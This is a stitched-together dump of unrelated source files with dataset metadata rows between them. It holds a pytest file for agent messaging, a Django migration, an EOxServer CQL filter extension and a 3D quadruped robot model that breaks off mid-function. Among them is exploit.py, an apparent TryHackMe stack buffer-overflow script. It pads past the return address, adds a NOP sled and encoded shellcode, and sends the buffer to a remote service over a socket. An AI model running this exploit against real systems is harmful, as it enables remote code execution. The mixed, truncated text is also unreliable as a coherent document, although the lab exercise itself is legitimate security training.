comm1.discovery.register_computation('c2', 'a2', ('127.0.0.1', 10002))
comm2.discovery.register_computation('c1', 'a1', ('127.0.0.1', 10001))
def raise_unknown(*args):
raise UnknownComputation('test')
comm2.messaging.post_msg = MagicMock(side_effect=raise_unknown)
# Default mode is ignore : always returns True
assert comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('a1', 'test1'), MSG_ALGO))
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unknown_agent_fail_mode(self, http_comms):
comm1, comm2 = http_comms
# on a1, do NOT register a2, and still try to send a message to it
with pytest.raises(UnknownAgent):
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('a1', 't1'), MSG_ALGO),
on_error='fail')
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unknown_agent_ignore_mode(self, http_comms):
comm1, comm2 = http_comms
# on a1, do NOT register a2, and still try to send a message to it
# Default mode is ignore : always returns True
assert comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2',Message('a1','t1'), MSG_ALGO))
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unreachable_agent_fail_mode(self, http_comms):
comm1, comm2 = http_comms
# on a1, register a2 with the wrong port number
comm1.discovery.register_computation('c2', 'a2', ('127.0.0.1', 10006))
comm2.discovery.register_computation('c1', 'a1', ('127.0.0.1', 10001))
with pytest.raises(UnreachableAgent):
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('a1', '1'), MSG_ALGO),
on_error='fail')
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unreachable_agent_ignore_mode(self, http_comms):
comm1, comm2 = http_comms
# on a1, register a2 with the wrong port number
comm1.discovery.register_computation('c2', 'a2', ('127.0.0.1', 10006))
comm2.discovery.register_computation('c1', 'a1', ('127.0.0.1', 10001))
assert comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('a1', 't'), MSG_ALGO))
| 37.395257
| 80
| 0.63228
| 15,846
| 0.837438
| 616
| 0.032555
| 9,218
| 0.487158
| 0
| 0
| 4,092
| 0.216256
|
af19bd3d785d56642d7b3f0a837d7edbf7bf7261
| 1,975
|
py
|
Python
|
Stack-Based-BOF/THM-BOF-1/exploit.py
|
Rob-VanDusen/ctf-notes
|
c88dc7597bca1bcda88d5ef07f38dcb50b89be59
|
[
"CC0-1.0"
] | null | null | null |
Stack-Based-BOF/THM-BOF-1/exploit.py
|
Rob-VanDusen/ctf-notes
|
c88dc7597bca1bcda88d5ef07f38dcb50b89be59
|
[
"CC0-1.0"
] | null | null | null |
Stack-Based-BOF/THM-BOF-1/exploit.py
|
Rob-VanDusen/ctf-notes
|
c88dc7597bca1bcda88d5ef07f38dcb50b89be59
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
import socket
ip = "10.10.16.223"
port = 1337
prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "\xaf\x11\x50\x62" # 625011AF
padding = "\x90" * 16
payload = ("\xbe\x13\xbf\x94\xb6\xdb\xd7\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x70\x0e\x03\x63\xb1\x76\x43\x7f\x25\xf4"
"\xac\x7f\xb6\x99\x25\x9a\x87\x99\x52\xef\xb8\x29\x10\xbd\x34"
"\xc1\x74\x55\xce\xa7\x50\x5a\x67\x0d\x87\x55\x78\x3e\xfb\xf4"
"\xfa\x3d\x28\xd6\xc3\x8d\x3d\x17\x03\xf3\xcc\x45\xdc\x7f\x62"
"\x79\x69\x35\xbf\xf2\x21\xdb\xc7\xe7\xf2\xda\xe6\xb6\x89\x84"
"\x28\x39\x5d\xbd\x60\x21\x82\xf8\x3b\xda\x70\x76\xba\x0a\x49"
"\x77\x11\x73\x65\x8a\x6b\xb4\x42\x75\x1e\xcc\xb0\x08\x19\x0b"
"\xca\xd6\xac\x8f\x6c\x9c\x17\x6b\x8c\x71\xc1\xf8\x82\x3e\x85"
"\xa6\x86\xc1\x4a\xdd\xb3\x4a\x6d\x31\x32\x08\x4a\x95\x1e\xca"
"\xf3\x8c\xfa\xbd\x0c\xce\xa4\x62\xa9\x85\x49\x76\xc0\xc4\x05"
"\xbb\xe9\xf6\xd5\xd3\x7a\x85\xe7\x7c\xd1\x01\x44\xf4\xff\xd6"
"\xab\x2f\x47\x48\x52\xd0\xb8\x41\x91\x84\xe8\xf9\x30\xa5\x62"
"\xf9\xbd\x70\x24\xa9\x11\x2b\x85\x19\xd2\x9b\x6d\x73\xdd\xc4"
"\x8e\x7c\x37\x6d\x24\x87\xd0\x98\xbd\xaf\xf8\xf5\xbf\xaf\xe9"
"\x59\x49\x49\x63\x72\x1f\xc2\x1c\xeb\x3a\x98\xbd\xf4\x90\xe5"
"\xfe\x7f\x17\x1a\xb0\x77\x52\x08\x25\x78\x29\x72\xe0\x87\x87"
"\x1a\x6e\x15\x4c\xda\xf9\x06\xdb\x8d\xae\xf9\x12\x5b\x43\xa3"
"\x8c\x79\x9e\x35\xf6\x39\x45\x86\xf9\xc0\x08\xb2\xdd\xd2\xd4"
"\x3b\x5a\x86\x88\x6d\x34\x70\x6f\xc4\xf6\x2a\x39\xbb\x50\xba"
"\xbc\xf7\x62\xbc\xc0\xdd\x14\x20\x70\x88\x60\x5f\xbd\x5c\x65"
"\x18\xa3\xfc\x8a\xf3\x67\x1c\x69\xd1\x9d\xb5\x34\xb0\x1f\xd8"
"\xc6\x6f\x63\xe5\x44\x85\x1c\x12\x54\xec\x19\x5e\xd2\x1d\x50"
"\xcf\xb7\x21\xc7\xf0\x9d")
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
| 39.5
| 73
| 0.696709
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,605
| 0.812658
|
af1a49eb92cc6d5d66baa56866caa452bb8f70bb
| 1,116
|
py
|
Python
|
classification/migrations/0055_new_ekey_lrg_identifier.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | 5
|
2021-01-14T03:34:42.000Z
|
2022-03-07T15:34:18.000Z
|
classification/migrations/0055_new_ekey_lrg_identifier.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | 551
|
2020-10-19T00:02:38.000Z
|
2022-03-30T02:18:22.000Z
|
classification/migrations/0055_new_ekey_lrg_identifier.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | null | null | null |
# Generated by Django 3.2.4 on 2021-09-08 04:50
from django.db import migrations
def _insert_lrg_id_key(apps, schema_editor):
""" This can be deleted if there is a blat_keys migration after it """
EvidenceKey = apps.get_model("classification", "EvidenceKey")
EvidenceKey.objects.get_or_create(
key="lrg_id",
defaults={
"evidence_category": "V", # Variant section
"order": 4,
"value_type": "F", # free text
"copy_consensus": False,
"max_share_level": "public",
"label": "Locus Reference Genomic ID",
"description": "Locus Reference Genomic (LRG) is a manually curated record that contains stable and thus, un-versioned reference sequences designed specifically for reporting sequence variants with clinical implications.",
"see": "http://www.lrg-sequence.org/",
}
)
class Migration(migrations.Migration):
dependencies = [
('classification', '0054_alter_uploadedfilelab_options'),
]
operations = [
migrations.RunPython(_insert_lrg_id_key)
]
| 33.818182
| 234
| 0.646953
| 207
| 0.185484
| 0
| 0
| 0
| 0
| 0
| 0
| 608
| 0.544803
|
af1cd328ee95b3ce28045b665a6e2190194f9a9c
| 2,849
|
py
|
Python
|
eoxserver/services/opensearch/extensions/cql.py
|
kalxas/eoxserver
|
8073447d926f3833923bde7b7061e8a1658dee06
|
[
"OML"
] | 25
|
2015-08-10T19:34:34.000Z
|
2021-02-05T08:28:01.000Z
|
eoxserver/services/opensearch/extensions/cql.py
|
kalxas/eoxserver
|
8073447d926f3833923bde7b7061e8a1658dee06
|
[
"OML"
] | 153
|
2015-01-20T08:35:49.000Z
|
2022-03-16T11:00:56.000Z
|
eoxserver/services/opensearch/extensions/cql.py
|
kalxas/eoxserver
|
8073447d926f3833923bde7b7061e8a1658dee06
|
[
"OML"
] | 10
|
2015-01-23T15:48:30.000Z
|
2021-01-21T15:41:18.000Z
|
# ------------------------------------------------------------------------------
#
# Project: EOxServer <http://eoxserver.org>
# Authors: Fabian Schindler <fabian.schindler@eox.at>
#
# ------------------------------------------------------------------------------
# Copyright (C) 2017 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# ------------------------------------------------------------------------------
from eoxserver.core.decoders import kvp
from eoxserver.core.util.xmltools import NameSpace
from eoxserver.services import filters, ecql
class CQLExtension(object):
""" Implementation of the OpenSearch `'EO' extension
<http://docs.opengeospatial.org/is/13-026r8/13-026r8.html>`_.
"""
namespace = NameSpace(
"http://a9.com/-/opensearch/extensions/cql/1.0/", "cql"
)
def filter(self, qs, parameters):
mapping, mapping_choices = filters.get_field_mapping_for_model(qs.model)
decoder = CQLExtensionDecoder(parameters)
cql_text = decoder.cql
if cql_text:
ast = ecql.parse(cql_text)
filter_expressions = ecql.to_filter(ast, mapping, mapping_choices)
qs = qs.filter(filter_expressions)
return qs
def get_schema(self, collection=None, model_class=None):
return (
dict(name="cql", type="cql", profiles=[
dict(
href="http://www.opengis.net/csw/3.0/cql",
title=(
"CQL (Common Query Language) is a query language "
"created by the OGC for the Catalogue Web Services "
"specification."
)
)
]),
)
class CQLExtensionDecoder(kvp.Decoder):
cql = kvp.Parameter(num="?", type=str)
| 39.569444
| 80
| 0.614953
| 1,249
| 0.438399
| 0
| 0
| 0
| 0
| 0
| 0
| 1,777
| 0.623728
|
af1d6a6d06805cdde1b38ccbd57154e51315542b
| 31,786
|
py
|
Python
|
examples/quadruped3D.py
|
alknemeyer/physical_education
|
7bcad4111bc153a0c9c080f11a43295bd1d8c425
|
[
"MIT"
] | 5
|
2020-09-27T14:00:12.000Z
|
2022-01-31T09:06:37.000Z
|
examples/quadruped3D.py
|
alknemeyer/physical_education
|
7bcad4111bc153a0c9c080f11a43295bd1d8c425
|
[
"MIT"
] | 8
|
2020-09-27T15:02:28.000Z
|
2022-03-28T13:51:38.000Z
|
examples/quadruped3D.py
|
alknemeyer/physical_education
|
7bcad4111bc153a0c9c080f11a43295bd1d8c425
|
[
"MIT"
] | 2
|
2020-09-27T14:01:39.000Z
|
2022-01-21T09:47:54.000Z
|
from typing import Any, Dict, Iterable, List, Optional, Tuple, Callable
from math import pi as π
from sympy import Matrix as Mat
from numpy import ndarray
from physical_education.links import Link3D, constrain_rel_angle
from physical_education.system import System3D
from physical_education.foot import add_foot, feet, Foot3D
from physical_education.motor import add_torque
from physical_education.drag import add_drag
from physical_education.spring import add_torquespring
from physical_education.damper import add_torquedamper
parameters = {
# # The model below is terribly out of date. If needed, manually
# # uncomment + test it!
# 'model-6': {
# 'source': """
# A model of cheetah 6 from Functional anatomy of the cheetah (Acinonyx jubatus) forelimb and hindlimb
# doi: 10.1111/j.1469-7580.2011.01344.x and 10.1111/j.1469-7580.2010.01310.x
# """,
# 'body_B': {'mass': 17., 'radius': 0.08, 'length': 0.41},
# 'body_F': {'mass': 8., 'radius': 0.08, 'length': 0.21},
# 'tail0': {'mass': 0.4, 'radius': 0.005, 'length': 0.38},
# 'tail1': {'mass': 0.2, 'radius': 0.005, 'length': 0.38},
# 'front': {
# 'thigh': {'mass': 0.171, 'radius': 0.012, 'length': 0.254},
# 'calf': {'mass': 0.068, 'radius': 0.005, 'length': 0.247},
# },
# 'back': {
# 'thigh': {'mass': 0.210, 'radius': 0.010, 'length': 0.281},
# 'calf': {'mass': 0.160, 'radius': 0.011, 'length': 0.287},
# },
# 'friction_coeff': 1.3,
# 'motor_params': {'torque_bounds': (-2., 2.), 'no_load_speed': 50.},
# },
'mean-male': {
'source': """
Parameters for the 'mean' (X) cheetah from
Morphology, Physical Condition, and Growth of the Cheetah (Acinonyx jubatus jubatus)
https://academic.oup.com/jmammal/article/84/3/840/905900
body mass = 45.6 kg ---> majority (42kg?) in body
chest girth = 71.7 cm ---> front radius = 0.717m / (2*pi)
abdomen girth = 59.4 cm ---> back radius = 0.594m / (2*pi)
skull length = 23.4 cm
body length = 125.5 cm ---> body - skull - neck = 125.5 - 23.4 - (20?) = 80cm => front = 0.5m, back = 0.3m
tail length = 76.7 cm ---> 38cm per half
total length = 202.2 cm
total foreleg length = 77 cm
total hind leg length = 81.1 cm
front foot length = 8.2 cm
front foot width = 6.1 cm
hind foot length = 9.2 cm
hind foot width = 6.2 cm
From "Quasi-steady state aerodynamics of the cheetah tail"
fur length on tail = 10mm on average
average tail diameter (no fur) = 31mm
---> radius = 31/2 + 10 = 25.5mm = 0.0255m
Friction coeff of 1.3 from
"Locomotion dynamics of hunting in wild cheetahs"
NOTE: leg measurements mostly cribbed from 'model-6' above. Find proper values!
lengths = same
masses = same * 1.2
radii = same
NOTE: the motor_params values are mostly made up. In any case, different muscle
groups would need different values
""",
'body_B': {'mass': 28., 'radius': 0.594/(2*π), 'length': 0.3},
'body_F': {'mass': 14., 'radius': 0.717/(2*π), 'length': 0.5},
'tail0': {'mass': 0.4, 'radius': 0.0255, 'length': 0.38},
'tail1': {'mass': 0.2, 'radius': 0.0255, 'length': 0.38},
'front': {
'thigh': {'mass': 0.171*1.2, 'radius': 0.012, 'length': 0.254},
'calf': {'mass': 0.068*1.2, 'radius': 0.005, 'length': 0.247},
},
'back': {
'thigh': {'mass': 0.210*1.2, 'radius': 0.010, 'length': 0.281},
# based on ratios
'calf': {'mass': 0.100*1.2, 'radius': 0.011, 'length': 0.287 * 1.1*(33/(33+24.5))},
# from Liams model
'hock': {'mass': 0.060*1.2, 'radius': 0.011, 'length': 0.287 * 1.1*(24.5/(33+24.5))},
},
'friction_coeff': 1.3,
# measured in terms of body weight, based on the observed limits
# of energy efficient gallops and C-turns at 8, 14 and 20 m/s
# for this model
'motor': {
'spine': {'torque_bounds': (-0.7, 0.7), 'no_load_speed': 50.},
'spine-tail0': {'torque_bounds': (-0.25, 0.25), 'no_load_speed': 50.},
'tail0-tail1': {'torque_bounds': (-0.2, 0.2), 'no_load_speed': 50.},
'front': {
'hip-pitch': {'torque_bounds': (-0.5, 0.6), 'no_load_speed': 50.},
'hip-abduct': {'torque_bounds': (-0.5, 0.6), 'no_load_speed': 50.},
'knee': {'torque_bounds': (-0.5, 0.4), 'no_load_speed': 50.},
},
'back': {
'hip-pitch': {'torque_bounds': (-0.6, 0.6), 'no_load_speed': 50.},
'hip-abduct': {'torque_bounds': (-0.4, 0.5), 'no_load_speed': 50.},
'knee': {'torque_bounds': (-0.1, 0.5), 'no_load_speed': 50.},
'ankle': {'torque_bounds': (-0.4, 0.05), 'no_load_speed': 50.},
},
},
},
}
def model(params: Dict[str, Any], with_tail: bool) -> Tuple[System3D, Callable[[System3D], None]]:
"""
Defines a quadruped model based off a cheetah (see `cheetah-model.png`).
Roughly 400 000 operations in the equations of motion without simplification,
and 140 000 if simplified with
>>> robot.calc_eom(simp_func = lambda x: utils.parsimp(x, nprocs = 14))
Note that the numbers are probably out of date at this point.
"""
# create front and back links of body and tail
body_B = Link3D('base_B', '+x', base=True, **params['body_B'],
meta=['spine', 'back'])
body_F = Link3D('base_F', '+x', start_I=body_B.bottom_I, **params['body_F'],
meta=['spine', 'front'])
# input torques for roll, pitch and yaw of the spine
# body_B.add_hookes_joint(body_F, about='xyz')
add_torque(body_B, body_F, about='xyz', **params['motor']['spine'])
# spring/damper forces on spine
phi_b, th_b, psi_b = body_B.q[3:]
phi_f, th_f, psi_f = body_F.q[:3]
for angles, dof in [(phi_b - phi_f, 'roll'),
(th_b - th_f, 'pitch'),
(psi_b - psi_f, 'yaw')]:
# TODO: actually find these by initialising to 0.5 and bounding to (0.1, 10.)
# the current fixed values are sort of arbitrary (based on a paper)
# about humans
add_torquespring(body_B, body_F, angles, spring_coeff=0.5,
# spring_coeff_lims=(0.1, 10.),
rest_angle=0,
name=f'spine-torquespring-{dof}')
add_torquedamper(body_B, body_F, angles, damping_coeff=0.5,
# damping_coeff_lims=(0.1, 10.),
name=f'spine-torquedamper-{dof}')
# drag on body
add_drag(body_F, at=body_F.bottom_I, name='body_F-drag-head',
use_dummy_vars=True, cylinder_top=True)
add_drag(body_F, at=body_F.Pb_I, name='body_F-drag-body',
use_dummy_vars=True)
add_drag(body_B, at=body_B.Pb_I, use_dummy_vars=True)
if with_tail:
tail0 = Link3D('tail0', '-x', start_I=body_B.top_I,
**params['tail0'], meta=['tail'])
tail1 = Link3D('tail1', '-x', start_I=tail0.bottom_I,
**params['tail1'], meta=['tail'])
# friction coefficient of 0.1 is arbitrary. Worth setting to 0
# in case it speeds things up?
add_foot(tail1, at='bottom', nsides=8, friction_coeff=0.1,
GRFxy_max=0.1, GRFz_max=0.1)
# input torques to tail - pitch and yaw
body_B.add_hookes_joint(tail0, about='xy')
add_torque(body_B, tail0, about='xy', **params['motor']['spine-tail0'])
# torques in the middle of the tail - pitch and yaw
tail0.add_hookes_joint(tail1, about='xy')
add_torque(tail0, tail1, about='xy', **params['motor']['tail0-tail1'])
# drag on tail
add_drag(tail0, at=tail0.Pb_I, use_dummy_vars=True)
add_drag(tail1, at=tail1.Pb_I, use_dummy_vars=True)
def def_leg(body: Link3D, front: bool, right: bool) -> Iterable[Link3D]:
"""Define a leg and attach it to the front/back right/left of `body`.
Only really makes sense when `body` is aligned along the `x`-axis"""
# maybe flip x (or y)
# the model is considered to face along the x axis (so front/back
# refers to changes in the y value).
def mfx(x): return x if front else -x
def mfy(y): return y if right else -y
start_I = body.Pb_I + \
body.Rb_I @ Mat([mfx(body.length/2), mfy(body.radius), 0])
suffix = ('F' if front else 'B') + ('R' if right else 'L')
frontorback_str = 'front' if front else 'back'
rightorleft_str = 'right' if right else 'left'
p = params[frontorback_str]
thigh = Link3D('U'+suffix, '-z', start_I=start_I, **p['thigh'],
meta=['leg', 'thigh', frontorback_str, rightorleft_str])
calf = Link3D('L'+suffix, '-z', start_I=thigh.bottom_I, **p['calf'],
meta=['leg', 'calf', frontorback_str, rightorleft_str])
# next, all of the muscles and their respective limits
muscleparams = params['motor'][frontorback_str]
# input torques: hip pitch and abduct
body.add_hookes_joint(thigh, about='xy')
add_torque(body, thigh, name=f'{frontorback_str}-{rightorleft_str}-hip-pitch',
about='x', **muscleparams['hip-pitch'])
add_torque(body, thigh, name=f'{frontorback_str}-{rightorleft_str}-hip-abduct',
about='y', **muscleparams['hip-abduct'])
thigh.add_revolute_joint(calf, about='y')
add_torque(thigh, calf, about='y', **muscleparams['knee'])
if front:
add_foot(calf, at='bottom', nsides=8,
friction_coeff=params['friction_coeff'],
GRFxy_max=5, GRFz_max=5)
return thigh, calf
else:
hock = Link3D('H'+suffix, '-z', start_I=calf.bottom_I, **p['hock'],
meta=['leg', 'calf', frontorback_str, rightorleft_str])
calf.add_revolute_joint(hock, about='y')
add_torque(calf, hock, about='y', **muscleparams['ankle'])
add_foot(hock, at='bottom', nsides=8,
friction_coeff=params['friction_coeff'],
GRFxy_max=5, GRFz_max=5)
return thigh, calf, hock
ufl, lfl = def_leg(body_F, front=True, right=False)
ufr, lfr = def_leg(body_F, front=True, right=True)
ubl, lbl, hbl = def_leg(body_B, front=False, right=False)
ubr, lbr, hbr = def_leg(body_B, front=False, right=True)
# combine into a robot
tail = [tail0, tail1] if with_tail else [] # type: ignore
robot = System3D('3D quadruped', [body_B, body_F, *tail,
ufl, lfl, ufr, lfr,
ubl, lbl, ubr, lbr,
hbl, hbr])
return robot, add_pyomo_constraints
def has_tail(robot: System3D) -> bool:
return any('tail' in link.name for link in robot.links)
def add_pyomo_constraints(robot: System3D) -> None:
# π/3 = 60 degrees
# π/2 = 90 degrees
# π/4 = 45 degrees
assert robot.m is not None,\
'robot does not have a pyomo model defined on it'
if has_tail(robot):
body_B, body_F, tail0, tail1, \
ufl, lfl, ufr, lfr, \
ubl, lbl, ubr, lbr, \
hbl, hbr = [link['q'] for link in robot.links]
else:
body_B, body_F, \
ufl, lfl, ufr, lfr, \
ubl, lbl, ubr, lbr, \
hbl, hbr = [link['q'] for link in robot.links]
tail0 = tail1 = None
# spine can't bend too much:
constrain_rel_angle(robot.m, 'spine_pitch',
-π/4, body_B[:, :, 'theta'], body_F[:, :, 'theta'], π/4)
constrain_rel_angle(robot.m, 'spine_roll',
-π/4, body_B[:, :, 'phi'], body_F[:, :, 'phi'], π/4)
constrain_rel_angle(robot.m, 'spine_yaw',
-π/4, body_B[:, :, 'psi'], body_F[:, :, 'psi'], π/4)
# tail can't go too crazy:
if tail0 is not None:
constrain_rel_angle(robot.m, 'tail_body_pitch',
-π/3, body_B[:, :, 'theta'], tail0[:, :, 'theta'], π/3)
constrain_rel_angle(robot.m, 'tail_body_yaw',
-π/3, body_B[:, :, 'phi'], tail0[:, :, 'phi'], π/3)
constrain_rel_angle(robot.m, 'tail_tail_pitch',
-π/2, tail0[:, :, 'theta'], tail1[:, :, 'theta'], π/2)
constrain_rel_angle(robot.m, 'tail_tail_yaw',
-π/2, tail0[:, :, 'phi'], tail1[:, :, 'phi'], π/2)
# legs: hip abduction and knee
for body, thigh, calf, hock, name in ((body_F, ufl, lfl, None, 'FL'),
(body_F, ufr, lfr, None, 'FR'),
(body_B, ubl, lbl, hbl, 'BL'),
(body_B, ubr, lbr, hbr, 'BR')):
constrain_rel_angle(robot.m, name + '_hip_pitch',
-π/2, body[:, :, 'theta'], thigh[:, :, 'theta'], π/2)
constrain_rel_angle(robot.m, name + '_hip_aduct',
-π/8, body[:, :, 'phi'], thigh[:, :, 'phi'], π/8)
lo, up = (-π, 0) if name.startswith('B') else (0, π)
constrain_rel_angle(robot.m, name + '_knee',
lo, thigh[:, :, 'theta'], calf[:, :, 'theta'], up)
if hock is not None:
lo, up = (0, π)
constrain_rel_angle(robot.m, name + '_foot',
lo, calf[:, :, 'theta'], hock[:, :, 'theta'], up)
for th in hock[:, :, 'theta']:
th.setub(+π/3)
th.setlb(-π/3)
# common functions
def high_speed_stop(robot: System3D, initial_vel: float, minimize_distance: bool,
gallop_data: Optional[dict] = None, offset: int = 0):
import math
import random
from physical_education.utils import copy_state_init
from physical_education.init_tools import add_costs
if not has_tail(robot):
from physical_education.visual import warn
warn('Need to update high_speed_stop for no tail model!')
nfe = len(robot.m.fe)
ncp = len(robot.m.cp)
total_time = float((nfe-1)*robot.m.hm0.value)
body = robot['base_B']
# start at the origin
body['q'][1, ncp, 'x'].fix(0)
body['q'][1, ncp, 'y'].fix(0)
if gallop_data is not None:
for fed, cpd in robot.indices(one_based=True):
robot.init_from_dict_one_point(
gallop_data, fed=fed, cpd=cpd, fes=(fed-1 + offset) % nfe, cps=0,
skip_if_fixed=True, skip_if_not_None=False, fix=False)
for link in robot.links:
for q in link.pyomo_sets['q_set']:
link['q'][1, ncp, q].fixed = True
link['dq'][1, ncp, q].fixed = True
else:
# init to y plane
body['q'][:, :, 'y'].value = 0
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][:, :, ang].value = 0
link['dq'][:, :, ang].value = 0
link['ddq'][:, :, ang].value = 0
# roughly bound to y plane
for fe, cp in robot.indices(one_based=True):
body['q'][fe, cp, 'y'].setub(0.2)
body['q'][fe, cp, 'y'].setlb(-0.2)
for link in robot.links:
for ang in ('phi', 'psi'):
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, ang].setub(math.pi/4)
link['q'][fe, cp, ang].setlb(-math.pi/4)
# bound theta
for fe, cp in robot.indices(one_based=True):
for link in robot.links[4:]: # all leg segments - no tail or body
link['q'][fe, cp, 'theta'].setub(math.radians(60))
link['q'][fe, cp, 'theta'].setlb(math.radians(-60))
for link in robot.links[:2]: # two body segments
link['q'][fe, cp, 'theta'].setub(math.radians(45))
link['q'][fe, cp, 'theta'].setlb(math.radians(-45))
for link in robot.links:
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = (
math.radians(random.gauss(0, 15)))
body['q'][1, ncp, 'z'].fix(0.6)
# both sides mirrored
for src, dst in (('UFL', 'UFR'), ('LFL', 'LFR'), ('UBL', 'UBR'), ('LBL', 'LBR')):
copy_state_init(robot[src]['q'], robot[dst]['q'])
# init tail to flick?
for link in robot.links[2:4]:
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = (
math.radians(random.random()*60))
# stop weird local minimum where it bounces
for fe, cp in robot.indices(one_based=True):
if fe in range(10):
continue
# if fe > nfe/2: continue
height = body['q'][fe, cp, 'z']
height.setub(0.6) # approx. leg height
for foot in feet(robot):
foot['foot_height'][fe, cp].setub(0.01)
# start at speed
body['dq'][1, ncp, 'x'].fix(initial_vel)
# end at rest
for link in robot.links:
for q in link.pyomo_sets['q_set']:
link['dq'][nfe, ncp, q].fix(0)
# end in a fairly standard position
for link in robot.links[:2]: # two body segments
link['q'][nfe, ncp, 'theta'].setub(math.radians(10))
link['q'][nfe, ncp, 'theta'].setlb(math.radians(-10))
for link in robot.links[4:]: # leaving out tail - it might flail, which is good
link['q'][nfe, ncp, 'theta'].setub(math.radians(20))
link['q'][nfe, ncp, 'theta'].setlb(math.radians(-20))
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][nfe, ncp, ang].setub(math.radians(5))
link['q'][nfe, ncp, ang].setlb(math.radians(-5))
# position and velocity over time
for fe in robot.m.fe:
pos = total_time * (initial_vel/2) * (fe-1)/(nfe-1)
vel = initial_vel * (1 - (fe-1)/(nfe-1))
# print('pos', pos, 'vel', vel)
body['q'][fe, :, 'x'].value = pos
body['dq'][fe, :, 'x'].value = vel
# objective
distance_cost = body['q'][nfe, ncp, 'x'] if minimize_distance else 0
return add_costs(robot, include_transport_cost=False, include_torque_cost=False,
distance_cost=0.0001*distance_cost)
def periodic_gallop_test(robot: System3D,
avg_vel: float,
feet: Iterable['Foot3D'],
foot_order_vals: Iterable[Tuple[int, int]],
init_from_dict: Optional[dict] = None,
at_angle_d: Optional[float] = None
):
"""
foot_order_vals = ((1, 7), (6, 13), (31, 38), (25, 32)) # 14 m/s
"""
from math import sin, cos, radians
import random
from physical_education import utils
from physical_education.foot import prescribe_contact_order
from physical_education.init_tools import sin_around_touchdown, add_costs
from physical_education.constrain import straight_leg, periodic
nfe = len(robot.m.fe)
ncp = len(robot.m.cp)
m = utils.get_pyomo_model_or_error(robot)
total_time = utils.total_time(m)
utils.constrain_total_time(m, total_time=total_time)
body = robot['base_B']
# start at the origin
body['q'][1, ncp, 'x'].fix(0)
body['q'][1, ncp, 'y'].fix(0)
if init_from_dict is None:
if at_angle_d is None or at_angle_d == 0:
# init to y plane
body['q'][:, :, 'y'].value = 0
# running in a straight line
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][:, :, ang].value = (
radians(at_angle_d or 0) if ang == 'psi' else 0
)
link['dq'][:, :, ang].value = 0
link['ddq'][:, :, ang].value = 0
for fe, cp in robot.indices(one_based=True):
var = robot.links[0]['q'][fe, cp, 'psi']
var.setub(radians((at_angle_d or 0) + 10))
var.setlb(radians((at_angle_d or 0) - 10))
# init theta
def rand(mu, sigma, offset=0):
return radians(random.gauss(mu, sigma)+offset)
for fe, cp in robot.indices(one_based=True):
# body
robot.links[0]['q'][fe, cp, 'theta'].value = rand(0, 15)
robot.links[1]['q'][fe, cp, 'theta'].value = rand(0, 15, +10)
# tail
if has_tail(robot):
robot.links[2]['q'][fe, cp, 'theta'].value = rand(0, 15, -10)
robot.links[3]['q'][fe, cp, 'theta'].value = rand(0, 15, -10)
offset = 2 if has_tail(robot) else 0
for link in robot.links[(2+offset):]: # legs
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = rand(0, 30)
# body height
body['q'][:, :, 'z'].value = 0.55
# the feet:
prescribe_contact_order(feet, foot_order_vals)
for (touchdown, liftoff), foot in zip(foot_order_vals, [foot.name.rstrip('_foot') for foot in feet]):
lower, upper = foot, 'U' + foot[1:]
straight_leg(robot[upper]['q'], robot[lower]['q'],
[touchdown], state='theta')
angles = sin_around_touchdown(int((touchdown + liftoff)/2),
len(robot.m.fe))
for fe, val in zip(robot.m.fe, angles): # type: ignore
robot[upper]['q'][fe, :, 'theta'].value = val
robot[lower]['q'][fe, :, 'theta'].value = val + \
radians(-15 if upper[1] == 'F' else 15)
# get timestep bounds ready
# [long/short] timesteps in the air
robot.m.hm[:].value = robot.m.hm[1].lb
for start, stop in foot_order_vals:
